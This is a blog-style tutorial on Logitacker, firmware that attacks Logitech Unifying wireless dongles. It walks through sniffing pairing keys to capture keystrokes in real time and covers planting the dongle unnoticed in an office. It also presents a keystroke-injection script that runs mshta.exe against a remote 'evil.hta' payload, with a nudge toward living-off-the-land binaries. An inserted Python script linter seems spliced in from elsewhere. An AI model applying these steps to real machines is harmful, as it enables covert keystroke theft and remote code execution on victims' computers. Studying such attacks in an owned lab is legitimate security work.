A small article about the Logitacker project. It's a kind of HID attack, dealing with Logitech dongles. It's a bit nerdy, so you've been warned.
So, what is a HID attack? Basically, it's an attack that uses a device simulating a human input device, like a mouse or a keyboard. These devices come in a variety of shapes, like the Bash Bunny from Hak5, or the RubberDucky, also from Hak5. Heck, you can even use an Arduino to do it. The only thing it has to do is take a short program, send it through an emulated keyboard running from USB, and get the machine to believe it came from a human being.
These devices vary in what they can do. Some only emulate a keyboard; some can also emulate an ethernet device or USB storage, and can run different kinds of scripting languages to automate the attack.
It's a bit like the good old autorun.inf from days past, which we used to include on CDs. But times change, and so do our tools. So what sets them apart from each other?
Well, the RubberDucky / Bash Bunny requires us to be at the target computer. Yes, we can run the attack, remove them, and take them with us, that's correct.
Projects like P4wnP1-ALOA let us plug a small Raspberry Pi Zero Wireless into the USB port and let it sit there, running an AP we can access to feed scripts through. That is an option, but... it's large, and looks very strange sitting in the back of a computer. What if there were another solution? There is: enter Logitacker.
It's a dream. It's small, it's normal looking, and it behaves and looks like an ordinary Logitech dongle, because it is. There's nothing wrong with it; it isn't changed in any way. It can be bought almost anywhere, and it's dirt cheap.
Most importantly, people can check it all they want and find nothing wrong with it. The downside: we have to place it, and we have to be around the office to use it (up to 100 meters, but this is not tested yet; more follows on range and antennas as I get it tested). The good thing is that all control is defined at the transmitter dongle, not at the receiver, aka the Logitech dongle itself. That means that once it's been planted, it will always be there.
So, what is Logitacker? It's a custom firmware, written by MaMe82 and maintained by Rogan Dawes. The project code is on GitHub.
The first thing we need is a dongle to run the firmware on. I use something like the april-usb-dongle-52840. It's one of the platforms Logitacker can run on, and can be had for 12 US Dollars + tax directly from the April Brothers website. Then, of course, a Logitech Unifying keyboard and dongle for testing, from your local hardware supplier.
But what can this thing do? Well, we can intercept the pairing process from the keyboard and get a copy of the encryption key, or test if the keyboard is vulnerable to injection directly. That enables us to dump keystrokes in real time when within range of the Logitech dongle, and that's a handy little feature. But, more importantly, we can inject keystrokes into the traffic, and Logitacker comes with its own scripting language, looking somewhat like the famous Duckyscript from the RubberDucky, that allows us to automate the attack.
Let's talk about the main menus for a bit. We have discover, passive-enum, active-enum, inject, script and pair.
The first thing is connecting. Insert the dongle and find out where it is. Use dmesg for that, and find the ttyACM device Logitacker is running on. When you have that, connect to it:
screen /dev/ttyACMx 115200
It will start in discover mode and show you the traffic running in the air around you. If your keyboard is already paired to the Logitech dongle, delete the pairing, and set Logitacker to sniff out the pairing process:
pair sniff
Now it should sniff the pairing process, and in a moment we switch to another mode, for dumping traffic:
options passive-enum pass-through-mouse on
options passive-enum pass-through-keyboard on
There you go. Try to type on the keyboard, and if everything works, the keys should be mirrored to Logitacker's output in real time :)
That's the first thing we can do. Now, let's have a talk about the scripting function.
We can use it for a lot of fun stuff, like executing scripts, downloading malware, irritating users, and whatever else we can think of. But we're getting ahead of ourselves here. Let's look at the scripting function itself.
The script function can use US-English, French, German and Danish as keyboard layout, and the scripting commands are these:
LOGITacker (discover) $ script
script - scripting for injection
Options:
-h, --help :Show command help.
Subcommands:
clear :clear current script (injection tasks)
undo :delete last command from script (last injection task)
show :show listing of current script
string :append 'string' command to script, which types out the text given as parameter
altstring :append 'altstring' command to script, which types out the text using NUMPAD
press :append 'press' command to script, which creates a key combination from the given parameters
delay :append 'delay' command to script, delays script execution by the amount of milliseconds given as parameter
store :store script to flash
load :load script from flash
list :list scripts stored on flash
remove :delete script from flash
As we can see, it's a very simple language, with just some basic functions. The keys we can simulate with the press command are:
RETURN, ESCAPE, TABULATOR, CAPS, PRINT, PRINTSCREEN, SCROLL, BREAK
INS, DEL, RIGHTARROW, LEFTARROW, DOWNARROW, UPARROW
NUM, APP, MENU, CTRL, CONTROL, SHIFT, ALT, GUI,
COMMAND, WINDOWS, NONE, ERROR_ROLLOVER, POST_FAIL, ERROR_UNDEFINED,
A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z
1, 2, 3, 4, 5, 6, 7, 8, 9, 0,
ENTER, ESC, BACKSPACE, TAB, SPACE, MINUS, EQUAL, LEFTBRACE, RIGHTBRACE,
BACKSLASH, HASHTILDE, SEMICOLON, APOSTROPHE,
GRAVE, COMMA, DOT, SLASH, CAPSLOCK
F1, F2, F3, F4, F5, F6, F7, F8, F9, F10, F11, F12
SYSRQ, SCROLLLOCK, PAUSE, INSERT,
HOME, PAGEUP, DELETE, END, PAGEDOWN, RIGHT, LEFT, DOWN, UP,
NUMLOCK, KPSLASH, KPASTERISK, KPMINUS, KPPLUS, KPENTER, KP1,
KP2, KP3, KP4, KP5, KP6, KP7, KP8, KP9, KP0, KPDOT, 102ND, COMPOSE, POWER, KPEQUAL
F13, F14, F15, F16, F17, F18, F19,
F20, F21, F22, F23, F24
OPEN, HELP, PROPS, FRONT, STOP, AGAIN, UNDO, CUT, COPY, PASTE, FIND, MUTE, VOLUMEUP, VOLUMEDOWN,
KPLEFTPARENTHESE, KPRIGHTPARENTHESE, LEFTCTRL, LEFTSHIFT, LEFTALT, LEFTMETA, RIGHTCTRL, RIGHTSHIFT, RIGHTALT, RIGHTMETA
A simple script looks like this:
LOGITacker (discover) $ script press NUMLOCK
LOGITacker (discover) $ script press GUI F1
LOGITacker (discover) $ script delay 500
LOGITacker (discover) $ script altstring "cmd.exe"
LOGITacker (discover) $ script press CTRL A
LOGITacker (discover) $ script press CTRL X
LOGITacker (discover) $ script press ALT F4
LOGITacker (discover) $ script delay 200
LOGITacker (discover) $ script press GUI
LOGITacker (discover) $ script delay 200
LOGITacker (discover) $ script press CTRL V
LOGITacker (discover) $ script press RETURN
LOGITacker (discover) $ script delay 500
LOGITacker (discover) $ script altstring "calc.exe"
LOGITacker (discover) $ script press RETURN
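The script syntax and key names above, as an added parser and linter (my own example here, not Logitacker's code): it strips pasted prompts, rejects unknown key names and malformed lines, and renders what a script would type and how long it waits, which is what you want when reviewing a captured or proposed script without ever running it. The sample script is constructed from the first lines of the listing above.

```python
# Added example, not Logitacker's own code: parse and lint the 'script' subcommands shown above
# so a captured or proposed script can be reviewed offline, before anything is ever typed.
import re, shlex
PRESS_KEYS = set("""RETURN ESCAPE TABULATOR CAPS PRINT PRINTSCREEN SCROLL BREAK INS DEL RIGHTARROW LEFTARROW
DOWNARROW UPARROW NUM APP MENU CTRL CONTROL SHIFT ALT GUI COMMAND WINDOWS NONE ERROR_ROLLOVER POST_FAIL
ERROR_UNDEFINED A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0 ENTER ESC BACKSPACE
TAB SPACE MINUS EQUAL LEFTBRACE RIGHTBRACE BACKSLASH HASHTILDE SEMICOLON APOSTROPHE GRAVE COMMA DOT SLASH
CAPSLOCK F1 F2 F3 F4 F5 F6 F7 F8 F9 F10 F11 F12 SYSRQ SCROLLLOCK PAUSE INSERT HOME PAGEUP DELETE END PAGEDOWN
RIGHT LEFT DOWN UP NUMLOCK KPSLASH KPASTERISK KPMINUS KPPLUS KPENTER KP1 KP2 KP3 KP4 KP5 KP6 KP7 KP8 KP9 KP0
KPDOT 102ND COMPOSE POWER KPEQUAL F13 F14 F15 F16 F17 F18 F19 F20 F21 F22 F23 F24 OPEN HELP PROPS FRONT STOP
AGAIN UNDO CUT COPY PASTE FIND MUTE VOLUMEUP VOLUMEDOWN KPLEFTPARENTHESE KPRIGHTPARENTHESE LEFTCTRL LEFTSHIFT
LEFTALT LEFTMETA RIGHTCTRL RIGHTSHIFT RIGHTALT RIGHTMETA""".split())
PROMPT = re.compile(r"^LOGITacker \([^)]*\) \$ ")  # strips a pasted "LOGITacker (discover) $ " prompt

def parse_script(text):
    # Returns [(task, arg), ...] for string/altstring/press/delay lines; ValueError on anything malformed.
    tasks = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = PROMPT.sub("", raw.strip())
        if not line: continue
        parts = shlex.split(line)  # shell-style split keeps a quoted "cmd.exe" as one argument
        if len(parts) < 2 or parts[0] != "script":
            raise ValueError(f"line {n}: expected 'script <subcommand> ...', got {raw!r}")
        cmd, args = parts[1], parts[2:]
        if cmd in ("string", "altstring") and len(args) == 1:
            tasks.append((cmd, args[0]))
        elif cmd == "press" and args and all(k.upper() in PRESS_KEYS for k in args):
            tasks.append((cmd, tuple(k.upper() for k in args)))  # a combination such as ("CTRL", "A")
        elif cmd == "delay" and len(args) == 1 and args[0].isdigit():
            tasks.append((cmd, int(args[0])))
        else:
            raise ValueError(f"line {n}: bad subcommand or arguments: {line!r}")
    return tasks

def describe(tasks):
    # Renders the tasks as a reviewer-friendly listing and sums the script's built-in delays (ms).
    out, wait_ms = [], 0
    for cmd, arg in tasks:
        if cmd == "press":
            out.append("press " + "+".join(arg))
        elif cmd == "delay":
            wait_ms += arg
            out.append(f"wait {arg} ms")
        else:
            out.append(f"type {arg!r}" + (" via NUMPAD" if cmd == "altstring" else ""))
    return out, wait_ms

# Constructed sample: the first lines of the article's calc.exe script, pasted with their prompts.
SAMPLE = """LOGITacker (discover) $ script press GUI F1
LOGITacker (discover) $ script delay 500
LOGITacker (discover) $ script altstring "cmd.exe"
LOGITacker (discover) $ script press ALT F4
script delay 200
script press RETURN"""
```

Running describe(parse_script(SAMPLE)) gives the six-line listing and a total built-in delay of 700 ms; a line such as "script press GUI FOO" is rejected with a ValueError naming the line.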
So, just for the fun of it, let's imagine we wrote something like this:
script press GUI R
script delay 500
script string "mshta.exe http://serverip/evil.hta"
script delay 200
script press ENTER
And let's imagine that at the other end, stored on a web server, is an .hta file with a payload. What would happen? It's just a thought; I'm not suggesting you actually do it, other than trying it out in a lab you own yourself.
And if you can't see the idea in this, look into Living-Off-The-Land binaries and that sort of strategy, and I'm sure you'll see the light in mshta.exe and its cousins. It really is a lot of fun.
So, this was a short intro to Logitacker. Really, give it a try, and while you're at it, try the other project, P4wnP1-ALOA, out as well. It's an advanced tool, based on a custom Kali Linux, for all kinds of HID fun, built on the Raspberry Pi Zero Wireless platform. For something with a little more computing power, try Kali on the Odroid C2 platform, for a little internal offensive box. That's another project I'm looking into, and more will follow on that one once I get it all sorted out :)
Happy Logitech Hunting :)